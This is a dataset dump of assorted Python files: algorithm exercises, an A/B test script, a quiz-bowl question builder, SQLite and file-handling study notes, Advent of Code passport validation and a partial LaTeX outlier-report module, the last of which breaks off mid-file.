blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
d0d3da78c68c0bdb702a89cfc32ad8921a762d4b | Python | JJongSue/ssafy_algorithm | /Problem/src/boj/Main2110.py | UTF-8 | 479 | 2.78125 | 3 | [] | no_license | import sys
# Apparently BOJ 2110 ("router installation"): given N house coordinates,
# place C routers so the minimum pairwise distance is maximized.
# Solved by parametric (binary) search on that minimum distance.
N, C = map(int, input().split())
nums = []
for i in range(N):
    nums.append(int(input()))
nums.sort()
# Answer lies between 1 and the full span of the sorted coordinates.
l = 1
r = nums[N-1] - nums[0]
ans = r
while l<=r:
    mid = int((l+r)/2)  # candidate minimum distance
    # Greedy feasibility check: how many routers fit at gaps >= mid?
    now = nums[0]
    cnt = 1
    for i in range(1, N):
        # print(i)
        d = nums[i] - now
        if d >= mid:
            now = nums[i]
            cnt = cnt+1
    # print(mid, cnt)
    if cnt >= C:
        # Feasible: remember mid and try an even larger distance.
        l = mid+1
        ans = mid
    else:
        r = mid-1
print(ans)
| true |
cbf3165c7c85e8e15582da1317f75cc63992d25d | Python | huangty1208/Data-Challenge | /Customer Cliff/AB_test.py | UTF-8 | 2,662 | 2.9375 | 3 | [] | no_license | # get an estimate sample size
# Packages imports
import numpy as np
import pandas as pd
import scipy.stats as stats
import statsmodels.stats.api as sms
import matplotlib as mpl
import matplotlib.pyplot as plt
import seaborn as sns
from math import ceil
# NOTE(review): '%matplotlib inline' is IPython/Jupyter magic -- this file
# only runs as a notebook cell, not as a plain Python script.
%matplotlib inline
# Some plot styling preferences
plt.style.use('seaborn-whitegrid')
font = {'family' : 'Helvetica',
'weight' : 'bold',
'size'   : 14}
mpl.rc('font', **font)
# calculate effect size by proportion (expected conversion 13% vs 15%)
effect_size = sms.proportion_effectsize(0.13, 0.15)    # Calculating effect size based on our expected rates
# Power analysis: sample size per group for 80% power at alpha=0.05.
required_n = sms.NormalIndPower().solve_power(
effect_size,
power=0.8,
alpha=0.05,
ratio=1
)                                                  # Calculating sample size needed
required_n = ceil(required_n)                          # Rounding up to next whole number
print(required_n)
# get dataframe info
# NOTE(review): `df` is assumed to be loaded in an earlier notebook cell.
df.info()
pd.crosstab(df['group'], df['landing_page'])
# get sample from both groups (fixed random_state for reproducibility)
control_sample = df[df['group'] == 'control'].sample(n=required_n, random_state=22)
treatment_sample = df[df['group'] == 'treatment'].sample(n=required_n, random_state=22)
ab_test = pd.concat([control_sample, treatment_sample], axis=0)
ab_test.reset_index(drop=True, inplace=True)
# basic stats for both groups
conversion_rates = ab_test.groupby('group')['converted']
std_p = lambda x: np.std(x, ddof=0)              # Std. deviation of the proportion
se_p = lambda x: stats.sem(x, ddof=0)            # Std. error of the proportion (std / sqrt(n))
conversion_rates = conversion_rates.agg([np.mean, std_p, se_p])
conversion_rates.columns = ['conversion_rate', 'std_deviation', 'std_error']
conversion_rates.style.format('{:.3f}')
# for a very large sample, we can use the normal approximation for calculating our p-value
from statsmodels.stats.proportion import proportions_ztest, proportion_confint
control_results = ab_test[ab_test['group'] == 'control']['converted']
treatment_results = ab_test[ab_test['group'] == 'treatment']['converted']
n_con = control_results.count()
n_treat = treatment_results.count()
successes = [control_results.sum(), treatment_results.sum()]
nobs = [n_con, n_treat]
# Two-proportion z-test plus 95% confidence intervals for each group.
z_stat, pval = proportions_ztest(successes, nobs=nobs)
(lower_con, lower_treat), (upper_con, upper_treat) = proportion_confint(successes, nobs=nobs, alpha=0.05)
print(f'z statistic: {z_stat:.2f}')
print(f'p-value: {pval:.3f}')
print(f'ci 95% for control group: [{lower_con:.3f}, {upper_con:.3f}]')
print(f'ci 95% for treatment group: [{lower_treat:.3f}, {upper_treat:.3f}]')
# use z statistics to draw conclusion
| true |
dfe2edf746f3f9f7d0c8e8ca5d2fc13460046294 | Python | ksjpswaroop/qb | /qanta/util/build_science_mc.py | UTF-8 | 6,025 | 2.765625 | 3 | [
"MIT"
] | permissive | # Script to generate output equivalent to the AI2 Kaggle science challenge
import sqlite3
import operator
import random
from csv import DictWriter
from collections import defaultdict
from qanta import logging
from qanta.extract_features import instantiate_feature
from qanta.datasets.quiz_bowl import QuestionDatabase
log = logging.get(__name__)
# Answers appearing fewer than this many times in the science categories
# are excluded from the generated question set.
COUNT_CUTOFF = 2
# Choice labels for multiple-choice answers (answerA, answerB, ...).
CHOICEIDS = "ABCDEFGHIJKLMNOP"
# Category names that count as "science" questions (string contents are
# data read at runtime -- kept verbatim).
CATEGORIES = set("""Science
Science:Astronomy
Science:Biology
Science:Chemistry
Science:Computer_Science
Science:Earth_Science
Science:Math
Science:Mathematics
Science:Other
Mathematics
Physics
Biology
Chemistry
Earth Science
Science:Physics""".split("\n"))
class McScience:
    """One multiple-choice science question assembled from a quiz-bowl question."""

    def __init__(self, page, question, fold):
        self.page = page          # correct answer (Wikipedia page title)
        self.question = question  # source question id
        self.choices = []
        self.fold = fold          # e.g. "train" or "devtest"
        self.text = None

    def add_text(self, text):
        """Attach the question prompt text."""
        self.text = text

    def add_choices(self, choices):
        """Store the candidate answers in randomized order."""
        shuffled = list(choices)
        random.shuffle(shuffled)
        self.choices = shuffled

    def csv_line(self, choice_strings, destination="train"):
        """Build one CSV row dict.

        The "key" destination keeps only id and correctAnswer; "test" omits
        correctAnswer; "train" carries everything.
        """
        row = {}
        row["id"] = self.question
        show_content = destination != "key"
        if show_content:
            row["question"] = self.text
        for position, candidate in enumerate(self.choices):
            if show_content:
                row["answer%s" % choice_strings[position]] = candidate
            if candidate == self.page and destination in ("train", "key"):
                row["correctAnswer"] = choice_strings[position]
        assert self.page in self.choices, "Correct answer %s not in the set %s" % \
            (self.page, str(self.choices))
        return row
def question_top_guesses(text, deep, guess_connection, id, page, num_guesses=4):
    """
    Return a set of num_guesses candidate answers for a question, always
    containing the correct `page`.

    Candidates come first from the precomputed `guesses` table (highest
    score first); if that yields too few distinct pages, guesses from the
    DAN model `deep` fill the remainder.
    """
    c = guess_connection.cursor()
    # NOTE(review): SQL built with %-formatting; safe only while `id` and
    # `num_guesses` are ints. Parameterized queries would be more robust.
    command = ('select page from guesses where sentence = 2 and token = 0 and question = %i ' +
'order by score desc limit %i') % (id, num_guesses+1)
    c.execute(command)
    choices = set([page])
    for ii, in c:
        if len(choices) < num_guesses and not ii in choices:
            choices.add(ii)
    # If we don't have enough guesses, generate more
    # NOTE(review): the DAN is queried even when `choices` is already full;
    # the loop below then simply adds nothing.
    new_guesses = deep.text_guess(text)
    # sort the guesses and add them (highest scoring first)
    for guess, score in sorted(new_guesses.items(), key=operator.itemgetter(1), reverse=True):
        if len(choices) < num_guesses and not guess in choices:
            choices.add(guess)
    return choices
def question_first_sentence(database_connection, question):
    """
    Return the raw text of the first stored row for the given question id,
    or None when the question has no text rows.

    (The original docstring described a different function; it also built
    the SQL with %-formatting, replaced here by a parameterized query.)
    """
    c = database_connection.cursor()
    # Parameterized query: no injection/formatting pitfalls.
    c.execute('select raw from text where question=?', (question,))
    row = c.fetchone()
    return row[0] if row is not None else None
def main():
    """Build AI2-Kaggle-style multiple-choice CSVs from the question DB.

    Reads questions.db and guesses.db, keeps non-NAQT science questions
    whose answer appears at least COUNT_CUTOFF times, builds one McScience
    per question, and writes train/test/key CSV files.
    """
    import argparse
    parser = argparse.ArgumentParser(description='')
    default_path = 'data/'
    parser.add_argument('--question_db', type=str, default=default_path + 'questions.db')
    parser.add_argument('--guess_db', type=str, default=default_path + 'guesses.db',
help="Guess database")
    parser.add_argument("--num_choices", type=int, default=4,
help="How many choices do we write")
    parser.add_argument("--train_out", type=str, default="sci_train.csv")
    parser.add_argument("--test_out", type=str, default="sci_test.csv")
    parser.add_argument("--key_out", type=str, default="sci_key.csv")
    flags = parser.parse_args()
    # Create database connections
    log.info("Opening %s" % flags.question_db)
    question_database = sqlite3.connect(flags.question_db)
    guess_database = sqlite3.connect(flags.guess_db)
    # First get answers of interest and put them in a dictionary where the value is their count
    query = 'select page from questions where page != "" and ('
    query += " or ".join("category='%s'" % x for x in CATEGORIES)
    query += ")"
    c = question_database.cursor()
    log.info(query)
    c.execute(query)
    answer_count = defaultdict(int)
    for pp, in c:
        answer_count[pp] += 1
    # Second pass: iterate over every answered question.
    query = 'select page, id, naqt, fold from questions where page != ""'
    c = question_database.cursor()
    c.execute(query)
    log.info(str(list(x for x in answer_count if answer_count[x] >= COUNT_CUTOFF)))
    log.info(str(len(list(x for x in answer_count if answer_count[x] >= COUNT_CUTOFF))))
    # Load the DAN to generate guesses if they're missing from the database
    deep = instantiate_feature("deep", QuestionDatabase(flags.question_db))
    questions = {}
    question_num = 0
    for pp, ii, nn, ff in c:
        # Skip NAQT questions (naqt >= 0) and rare answers.
        if nn >= 0 or answer_count[pp] < COUNT_CUTOFF:
            continue
        question_num += 1
        question = McScience(pp, ii, ff)
        question.add_text(question_first_sentence(question_database, ii))
        choices = question_top_guesses(question.text, deep, guess_database, ii, pp,
flags.num_choices)
        question.add_choices(choices)
        questions[ii] = question
        # Progress logging every 100 questions.
        if question_num % 100 == 0:
            log.info('{} {} {}'.format(pp, ii, question_num))
            log.info(str(choices))
    answer_choices = ["answer%s" % CHOICEIDS[x] for x in range(flags.num_choices)]
    train_out = DictWriter(open(flags.train_out, 'w'), ["id", "question", "correctAnswer"] +
answer_choices)
    train_out.writeheader()
    test_out = DictWriter(open(flags.test_out, 'w'), ["id", "question"] + answer_choices)
    test_out.writeheader()
    key_out = DictWriter(open(flags.key_out, 'w'), ["id", "correctAnswer"])
    key_out.writeheader()
    # Now write the questions out: devtest fold -> test + key files,
    # everything else -> train file.
    for qq in questions.values():
        log.info(qq.fold)
        if qq.fold == "devtest":
            test_out.writerow(qq.csv_line(CHOICEIDS, "test"))
            key_out.writerow(qq.csv_line(CHOICEIDS, "key"))
        else:
            train_out.writerow(qq.csv_line(CHOICEIDS, "train"))
if __name__ == "__main__":
    main()
| true |
1c29793cf295c17e518cc58f1184b04bb34574d8 | Python | Mostofa-Najmus-Sakib/Applied-Algorithm | /Leetcode/Python Solutions/Design Data Structure/maxStack.py | UTF-8 | 928 | 3.859375 | 4 | [
"MIT"
] | permissive | """
LeetCode Problem: 716. Max Stack
Link: https://leetcode.com/problems/max-stack/
Language: Python
Written by: Mostofa Adib Shakib
Time Complexity: O(N)
Space Complexity: O(N)
"""
class MaxStack:
    """Stack with push/pop/top plus peekMax (O(1)) and popMax (O(n)).

    Each entry stores (value, running maximum of the stack up to and
    including that entry), so the current maximum is always at the top.
    """

    def __init__(self):
        self.stack = []

    def push(self, x: int) -> None:
        running_max = x if not self.stack else max(x, self.stack[-1][1])
        self.stack.append((x, running_max))

    def pop(self) -> int:
        value, _ = self.stack.pop()
        return value

    def top(self) -> int:
        return self.stack[-1][0]

    def peekMax(self) -> int:
        return self.stack[-1][1]

    def popMax(self) -> int:
        # Peel values off until the maximum surfaces, drop it, then
        # re-push the peeled values in their original order.
        target = self.stack[-1][1]
        suffix = []
        while self.stack[-1][0] != target:
            suffix.append(self.pop())
        self.stack.pop()
        while suffix:
            self.push(suffix.pop())
        return target
edcc5c2b4dfbc85e1a44ddfb39046f75a55e7d95 | Python | Laurence-mvt/AutomateTheBoringStuff | /chapter10/notes.py | UTF-8 | 2,545 | 3.53125 | 4 | [] | no_license | # chapter 10: Organizing files notes
# Chapter 10 (Automate the Boring Stuff): organizing files -- study notes.
# Commented-out calls and the triple-quoted blocks are deliberately
# disabled examples; the zipfile section at the bottom DOES execute.
import shutil, os
from pathlib import Path
# copy files
p = Path.cwd()
# shutil.copy(p/'AutomateTheBoringStuff/chapter10/notes.py', p/'AutomateTheBoringStuff/chapter9') # copies notes.py file to chapter9 folder
# copy a folder (tree)
# shutil.copytree(p/'AutomateTheBoringStuff/chapter10', p/'AutomateTheBoringStuff/chapter10Copy')
# move a file
# shutil.move('source', 'destination')
# delete single file at 'path'
# os.unlink('path')
# delete empty folder at 'path'
# os.rmdir('path')
# delete a folder at 'path' and all files and folders it contains
# shutil.rmtree('path')
# when deleting files/folders, good practice to run script for first time replacing
# delete method with print(files to be deleted) in its place
# instead of doing permanent delete with above, can use send2trash, for safer, soft delete (i.e. send to trash/recycle bin) - RECOMMENDED
"""import send2trash
baconFile = open('bacon.txt', 'a') # created the file
baconFile.write('Bacon is not a veg')
baconFile.close()
send2trash.send2trash('bacon.txt')"""
"""# get at the tree of the current directory with os.walk()
for folderName, subfolders, filenames in os.walk(Path.cwd()):
print('The current folder is ' + folderName)
for subfolder in subfolders:
print('SUBFOLDER OF' + folderName + ': ' + subfolder)
for filename in filenames:
print('FILE INSIDE ' + folderName + ': ' + filename)"""
# to work with zip files
import zipfile, os
from pathlib import Path
p = Path.cwd()/'AutomateTheBoringStuff'/'chapter10'
# NOTE(review): everything below requires example.zip (and spam.txt) to
# actually exist relative to the working directory, or it raises.
exampleZip = zipfile.ZipFile(p/'example.zip')
exampleZip.namelist() # list of strings for all files and folders contained. ['spam.txt', 'cats/', 'cats/catnames.txt', 'cats/zophie.jpg']
spamInfo = exampleZip.getinfo('spam.txt')
spamInfo.file_size
spamInfo.compress_size
print(f'Compressed file is {round(spamInfo.file_size/spamInfo.compress_size,2)}x smaller!')
exampleZip.close()
# extract from zip file
p = Path.cwd()/'AutomateTheBoringStuff'/'chapter10'
exampleZip = zipfile.ZipFile(p/'example.zip')
# NOTE(review): placeholder arguments -- this raises KeyError unless the
# archive really contains 'specificFileOrFolder.filetype'.
exampleZip.extract('specificFileOrFolder.filetype', 'destination') # to extract specific file/folder
exampleZip.extractall() # to extract entire zip file, optional argument to set which folder to extract to
exampleZip.close()
# create a zip file
newZip = zipfile.ZipFile('new.zip', 'w') # open in write mode
newZip.write('spam.txt', compress_type=zipfile.ZIP_DEFLATED) # can use other compression type parameters, but ZIP_DEFLATED works well for all data types
1c37bd8d3513c2bb7f016a7c35a315658cedb6cc | Python | sivant1361/python | /programs/SI.py | UTF-8 | 344 | 3.625 | 4 | [] | no_license | p=int(input("Principle amount="))
# Reads rate and years (the principal `p` is read just above this block)
# and computes simple or compound interest depending on the user's choice.
r=int(input("rate of interest="))
t=int(input("Number of years="))
ch=int(input("1.Simple interest\n2.Compound interest(1 or 2):"))
if (ch==1):
    # Simple interest: p*r*t/100
    si=(p*r*t)/100
    print("Simple interest=",si)
elif (ch==2):
    # Compound interest: p*(1 + r/100)^t - p
    ci=(p*((1+(r/100))**t))-p
    print("Compound interest=",ci)
else:
    print("Invalid input!!!")
8c3152b19d7bb34edc569b8c9cc7679706b23ffd | Python | deepakmarathe/whirlwindtourofpython | /data_science_tools/numpy_package.py | UTF-8 | 296 | 3.59375 | 4 | [] | no_license | # Numpy : Numerical Python
# NOTE(review): Python 2 syntax (`print` statements) -- will not run on Python 3.
import numpy as np
x = np.arange(1,10)  # [1, 2, ..., 9]
print x
print x ** 2  # elementwise square
print [i ** 2 for i in range(1, 10)]  # same values via a list comprehension
print x.reshape((3,3))
print x.reshape((3,3)).T  # transpose
print np.dot(x.reshape(3,3), [5, 6, 7])  # matrix-vector product
print np.linalg.eigvals(x.reshape(3,3))  # eigenvalues
M = x.reshape((3,3))
print "M : ", M
63773a9ae06e4ba916d79bfb44c55e59b2b594d1 | Python | hshrimp/test_school | /bilibili/t3.py | UTF-8 | 1,101 | 3.96875 | 4 | [] | no_license | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : wushaohong
'''
题目描述:
给定一个合法的表达式字符串,其中只包含非负整数、加法、减法以及乘法符号(不会有括号),
例如7+3*4*5+2+4-3-1,请写程序计算该表达式的结果并输出
输入
输入有多行,每行是一个表达式,输入以 END 作为结束;
输出
每行表达式的计算结果;
样例输入
7+3*4*5+2+4-3-1
2-3*1
END
样例输出
69
-1
'''
def cheng(temp):
    """Evaluate a '*'-separated product of integers, e.g. '3*4*5' -> 60."""
    factors = [int(token) for token in temp.split('*')]
    product = 1
    for factor in factors:
        product *= factor
    return product
def jian(temp):
    """Evaluate a '-'-separated chain of '*'-products, left to right."""
    first, *rest = temp.split('-')
    total = cheng(first)
    for term in rest:
        total -= cheng(term)
    return total
def find(text):
    """Evaluate a +,-,* expression without parentheses and print the result."""
    total = sum(jian(part) for part in text.split('+'))
    print(total)
if __name__ == '__main__':
    # Read expressions one per line until the sentinel 'END', then
    # evaluate and print each one in input order.
    texts = []
    tag = True
    while tag:
        text = input()
        if text != 'END':
            texts.append(text)
        else:
            tag = False
    for text in texts:
        find(text)
| true |
5632eafac5eca7cf08a78359d8b2d90468fa9c51 | Python | samuelyusunwang/quant-econ | /quantecon/career.py | UTF-8 | 2,644 | 3.578125 | 4 | [
"BSD-3-Clause"
] | permissive | """
Filename: career.py
Authors: Thomas Sargent, John Stachurski
A collection of functions to solve the career / job choice model of Neal.
"""
import numpy as np
from scipy.special import binom, beta
def gen_probs(n, a, b):
    """
    Generate and return the vector of probabilities for the Beta-binomial
    (n, a, b) distribution.
    """
    # Vectorized form of pmf(k) = C(n, k) * B(k + a, n - k + b) / B(a, b).
    ks = np.arange(n + 1)
    return binom(n, ks) * beta(ks + a, n - ks + b) / beta(a, b)
class workerProblem:
    """Parameters and discretized state space for the career/job choice model.

    theta and epsilon are N-point grids on [0, B]; F and G are Beta-binomial
    distributions over those grids.
    """

    def __init__(self, B=5.0, beta=0.95, N=50, F_a=1, F_b=1, G_a=1, G_b=1):
        self.beta = beta  # discount factor
        self.N = N        # grid size
        self.B = B        # upper bound of both payoff grids
        self.theta = np.linspace(0, B, N)    # set of theta values
        self.epsilon = np.linspace(0, B, N)  # set of epsilon values
        self.F_probs = gen_probs(N - 1, F_a, F_b)
        self.G_probs = gen_probs(N - 1, G_a, G_b)
        self.F_mean = np.sum(self.theta * self.F_probs)
        self.G_mean = np.sum(self.epsilon * self.G_probs)
def bellman(w, v):
    """
    The Bellman operator.
    * w is an instance of workerProblem
    * v is a 2D NumPy array representing the value function
    The array v should be interpreted as v[i, j] = v(theta_i, epsilon_j).
    Returns the updated value function Tv as an array of shape v.shape
    """
    Tv = np.empty(v.shape)
    # "New life" value is state-independent; compute it once.
    v3 = w.G_mean + w.F_mean + w.beta * \
        np.dot(w.F_probs, np.dot(v, w.G_probs))
    for i in range(w.N):
        # "New job" value depends only on the career index i.
        v2 = w.theta[i] + w.G_mean + w.beta * np.dot(v[i, :], w.G_probs)
        for j in range(w.N):
            # "Stay put" value depends on both indices.
            v1 = w.theta[i] + w.epsilon[j] + w.beta * v[i, j]
            Tv[i, j] = max(v1, v2, v3)
    return Tv
def get_greedy(w, v):
    """
    Compute optimal actions taking v as the value function. Parameters are
    the same as for bellman(). Returns a 2D NumPy array "policy", where
    policy[i, j] is the optimal action at state (theta_i, epsilon_j). The
    optimal action is represented as an integer in the set 1, 2, 3, where 1 =
    'stay put', 2 = 'new job' and 3 = 'new life'
    """
    policy = np.empty(v.shape, dtype=int)
    # "New life" value is state-independent; compute it once.
    v3 = w.G_mean + w.F_mean + w.beta * \
        np.dot(w.F_probs, np.dot(v, w.G_probs))
    for i in range(w.N):
        # "New job" value depends only on the career index i.
        v2 = w.theta[i] + w.G_mean + w.beta * np.dot(v[i, :], w.G_probs)
        for j in range(w.N):
            v1 = w.theta[i] + w.epsilon[j] + w.beta * v[i, j]
            # Ties resolve exactly as before: strict wins for 1 then 2,
            # otherwise action 3.
            if v1 > max(v2, v3):
                policy[i, j] = 1
            elif v2 > max(v1, v3):
                policy[i, j] = 2
            else:
                policy[i, j] = 3
    return policy
| true |
ec61526afc6ee2ff18bbaef230e1190feeef903f | Python | rogue0137/practice | /leetcode_python/medium/SOLVED-minimum-cost-to-connect-sticks.py | UTF-8 | 1,616 | 3.921875 | 4 | [] | no_license | # 1167. Minimum Cost to Connect Sticks
# https://leetcode.com/problems/minimum-cost-to-connect-sticks/
class Solution:
    def connectSticks(self, sticks: List[int]) -> int:
        """Return the minimum total cost to connect all sticks into one.

        Greedy: always merge the two shortest sticks. A min-heap makes each
        merge O(log n), so the whole run is O(n log n) instead of the
        original O(n^2) sorted-list/aux-stack merge; debug prints removed.
        """
        import heapq
        if len(sticks) < 2:
            # Zero or one stick: nothing to connect, no cost.
            return 0
        heap = list(sticks)
        heapq.heapify(heap)
        cost = 0
        while len(heap) > 1:
            combined = heapq.heappop(heap) + heapq.heappop(heap)
            cost += combined
            heapq.heappush(heap, combined)
        return cost

    def leftpop(self, sticks: List[int], stack: List[int]) -> int:
        """Pop and return the smaller front element of the two lists.

        Kept for backward compatibility with the original two-list merge
        approach; no longer used by connectSticks.
        """
        if not sticks:
            return stack.pop(0)
        if not stack:
            return sticks.pop(0)
        if sticks[0] < stack[0]:
            return sticks.pop(0)
        return stack.pop(0)
# Without comments
# Runtime: 436 ms, faster than 23.45% of Python3 online submissions for Minimum Cost to Connect Sticks.
# Memory Usage: 14.6 MB, less than 65.28% of Python3 online submissions for Minimum Cost to Connect Sticks.
# RETRY USING HEAP | true |
dc598bbc0e77037fc67ea86b90bb49681373fb67 | Python | portelaraian/algo-expert | /coding-interview-questions/find-duplicate-value/solution.py | UTF-8 | 286 | 3.515625 | 4 | [
"MIT"
] | permissive | # O(n) time | O(n) space - where n is the length of the input array
def firstDuplicateValue(array):
dict_values = {}
for value in array:
try:
dict_values[value] += 1
return value
except:
dict_values[value] = 1
return -1
| true |
d892ac639b3d0138e5ef950485e96e7d544833db | Python | bagustris/lpthw | /ex22-noFailure.py | UTF-8 | 303 | 2.578125 | 3 | [] | no_license | # ini adalah ex22.py
# ex22: "What have you learned from LPTHW so far?" (review exercise).
# NOTE(review): Python 2 `print` statement syntax; not valid Python 3.
# The printed text is the author's Indonesian study notes and is left as-is.
print """
Apa yang sudah kamu pelajari sejauh ini?
Peringatan
Hal terpenting ketika melakukan ini adalah: "Tidak ada kegagalan, HANYA MENCOBA, Tidak ada yang baru (kecuali kamu membuat improvisasi terhadap kode yang disediakan)
"""
| true |
d750ac08a984ad23cda9016035455da4c3d68902 | Python | Guilherme-Felix/Intro-Metodos-Discretos | /Exercicio1_EulerModificado.py | UTF-8 | 977 | 3.328125 | 3 | [] | no_license | import numpy as np
import matplotlib.pyplot as plt
from scipy import optimize
'''
Implementacao do metodo de euler modificado, segundo a ref.
https://www.ufrgs.br/reamat/CalculoNumerico/livro-py/pdvi-metodo_de_euler_melhorado.html
'''
# Modified (improved) Euler method for y' = arctan(y), y(0) = 1 on [0, 1),
# run at two resolutions (30 and 135 points) and plotted for comparison.
# NOTE(review): `interval`, `h`, and the `scipy.optimize` import above are unused.
interval = (0,1)
h = 1./30
N1 = 30
N2 = 135
h1 = 1./N1
h2 = 1./N2
x1 = np.arange(0,1,h1)
x2 = np.arange(0,1,h2)
y1 = np.zeros(N1)
y2 = np.zeros(N2)
# Initial condition y(0) = 1 for both grids.
y1[0] = 1
y2[0] = 1
def f(Y):
    # Right-hand side of the ODE: y' = arctan(y).
    return np.arctan(Y)
# Modified Euler method - 30 points (predictor step, then trapezoidal corrector)
for k in range(N1-1):
    yk = y1[k] + h1*f(y1[k])
    y1[k+1] = y1[k] + (h1/2)*( f(y1[k]) + f(yk))
# Modified Euler method - 135 points
for k in range(N2-1):
    yk = y2[k] + h2*f(y2[k])
    y2[k+1] = y2[k] + (h2/2)*( f(y2[k]) + f(yk))
# Plot the two solutions
plt.plot(x1, y1, 'r.', label="30 pontos", linewidth=1)
plt.plot(x2, y2, 'b:', label="135 pontos", linewidth=1)
plt.title("Metodo de Euler Modificado")
plt.legend()
plt.grid()
plt.savefig("Euler_modificado.png")
plt.show()
d25f215c8cacc7a5be4c10603f3131b39b3d5c7e | Python | juan7732/Advent-Of-Code-2020 | /Day4/advent.py | UTF-8 | 2,726 | 3.21875 | 3 | [] | no_license | from functools import reduce
import re
def composite_function(*func):
    """Compose functions left-to-right: composite_function(f, g)(x) == g(f(x)).

    With no arguments, returns the identity function.
    """
    def chain(inner, outer):
        return lambda value: outer(inner(value))
    return reduce(chain, func, lambda value: value)
def read_data():
    """Return the full contents of data.txt (the puzzle input) as one string."""
    with open('data.txt') as f:
        return f.read()
def parse_data(data):
    """Split the raw input into one single-line string per passport record.

    Records are separated by blank lines; newlines within a record become
    spaces.
    """
    return [record.replace('\n', ' ') for record in data.split('\n\n')]
def validate_passport(passport):
    """Return True when every required field is present ('cid' is optional).

    Replaces the verbose if/pass/else loop with all(), and drops the
    unused `opt_keys` local.
    """
    req_keys = ['byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid']
    return all(key in passport for key in req_keys)
def validate_passport_complex(passport):
    """Validate presence AND format of every required field (AoC 2020 day 4, part 2).

    Fixes three bugs in the original:
    * re.search accepted values merely *containing* a valid substring
      (e.g. a 10-digit pid, or '180cmx') -- re.fullmatch requires an
      exact match;
    * the hcl class `[0-f]` spans punctuation and uppercase in ASCII --
      restricted to `[0-9a-f]`;
    * the byr pattern `200[1-2]` missed the year 2000 (spec: 1920-2002).
    """
    rules = {
        'byr': r'19[2-9][0-9]|200[0-2]',                            # 1920-2002
        'iyr': r'201[0-9]|2020',                                    # 2010-2020
        'eyr': r'202[0-9]|2030',                                    # 2020-2030
        'hgt': r'1[5-8][0-9]cm|19[0-3]cm|59in|6[0-9]in|7[0-6]in',   # 150-193cm / 59-76in
        'hcl': r'#[0-9a-f]{6}',
        'ecl': r'amb|blu|brn|gry|grn|hzl|oth',
        'pid': r'[0-9]{9}',
    }
    for key, pattern in rules.items():
        if key not in passport:
            return False
        if re.fullmatch(pattern, passport[key]) is None:
            return False
    return True
def validate_passports(passports):
    """Return (valid_count, invalid_count) under the presence-only check."""
    records = [process_data_to_dict(raw) for raw in passports]
    valid = sum(1 for record in records if validate_passport(record))
    return valid, len(records) - valid
def validate_passports_complex(passports):
    """Return (valid_count, invalid_count) under the full field-format check."""
    records = [process_data_to_dict(raw) for raw in passports]
    valid = sum(1 for record in records if validate_passport_complex(record))
    return valid, len(records) - valid
def process_data_to_dict(passport):
    """Turn a 'k1:v1 k2:v2 ...' record string into a {key: value} dict."""
    pairs = (field.split(':') for field in passport.split(' '))
    return {parts[0]: parts[1] for parts in pairs}
# Part 1 pipeline: parse records -> count (valid, invalid) by field presence -> print.
advent_part_1 = composite_function(
    parse_data,
    validate_passports,
    print
)
# Part 2 pipeline: parse records -> count with full field-format validation -> print.
advent_part_2 = composite_function(
    parse_data,
    validate_passports_complex,
    print
)
# Both pipelines run at import time and require data.txt to exist.
advent_part_1(read_data())
advent_part_2(read_data())
| true |
ebc4be08bc5c4c6a23bb1e4168fe85d8968eccd3 | Python | Cebuick/test | /test/test.py | UTF-8 | 787 | 3.109375 | 3 | [] | no_license | import sqlite3
# connect() opens a connection to the SQLite database file.
# NOTE(review): hard-coded absolute Windows path -- only runs on that machine.
connexion = sqlite3.connect('D:/workspace/python/test/test/jobs.db')
# cursor() creates a cursor used to execute queries and fetch rows.
curseur = connexion.cursor() # create the cursor
query="select major from recent_grads;"
#print('1 '+ str(curseur.fetchone()))
curseur.execute(query) # execute the SQL query held in `query`; rows are then fetched through the cursor
#print('2 '+ str(curseur.fetchone()))
result1=curseur.fetchone() # fetch the first result row
result2=curseur.fetchone() # fetch the second result row
next_five_results=curseur.fetchmany(5) # fetch the next five rows
all_results=curseur.fetchall() # fetch all remaining rows
print(result1)
print(result2)
print(next_five_results)
print(all_results[0:5])
connexion.close()
| true |
f70dbfbef4499d0858fb66296dbd8967ecbd76c3 | Python | nickderobertis/data-code | /datacode/summarize/subset/outliers/detail/totex.py | UTF-8 | 4,050 | 2.75 | 3 | [
"MIT"
] | permissive | import pyexlatex.table as lt
import pandas as pd
from datacode.summarize import format_numbers_to_decimal_places
from datacode.typing import DfDict, Document
from datacode.typing import DocumentOrTables, DocumentOrTablesOrNone
def outlier_by_column_summary(bad_df_dict: DfDict, selected_orig_df_dict: DfDict,
                              keep_num_rows: int =40, output: bool =False,
                              outdir: str = None, as_document=True, author: str=None) -> DocumentOrTables:
    """Combine per-column outlier tables into one 'Outlier Summary' document.

    bad_df_dict maps column name -> DataFrame of outlier rows;
    selected_orig_df_dict maps column name -> DataFrame of surrounding
    original observations. Columns with no outliers contribute nothing.
    When `output` is True the document is also written to `outdir` as a PDF.
    Returns a Document when as_document is True, else the list of tables.
    """
    all_tables = []
    for col in bad_df_dict:
        all_tables.append(
            outlier_summary_for_col(
                bad_df_dict,
                selected_orig_df_dict,
                col,
                keep_num_rows=keep_num_rows,
                output=False,
                as_document=False
            )
        )
    # Drop the None entries produced by columns without outliers.
    all_tables = [table for table in all_tables if table is not None]
    full_title = 'Outlier Summary'
    document = Document.from_ambiguous_collection(
        all_tables,
        title=full_title,
        author=author
    )
    if output:
        assert outdir is not None
        document.to_pdf_and_move(
            outdir,
            outname=full_title,
            as_document=True
        )
    if as_document:
        return document
    else:
        return all_tables
def outlier_summary_for_col(bad_df_dict: DfDict, selected_orig_df_dict: DfDict,
                            col: str, keep_num_rows: int =40, output: bool =False,
                            outdir: str = None, as_document=True, author: str=None) -> DocumentOrTablesOnNoneAlias if False else DocumentOrTablesOrNone:
    """Build (and optionally output) the outlier summary tables for one column.

    Returns None when the column has no outliers; otherwise a Document
    (as_document=True) or the list of tables. When `output` is True the
    document is also written to `outdir` as a PDF.
    """
    bad_df = bad_df_dict[col]
    selected_orig_df = selected_orig_df_dict[col]
    if len(bad_df) == 0:
        print(f'No outliers for {col}. Will not add tables.')
        return None
    bad_table = _firm_list_table_from_df(
        bad_df,
        col,
        keep_num_rows=keep_num_rows,
        caption=f'Largest Outliers for {col}',
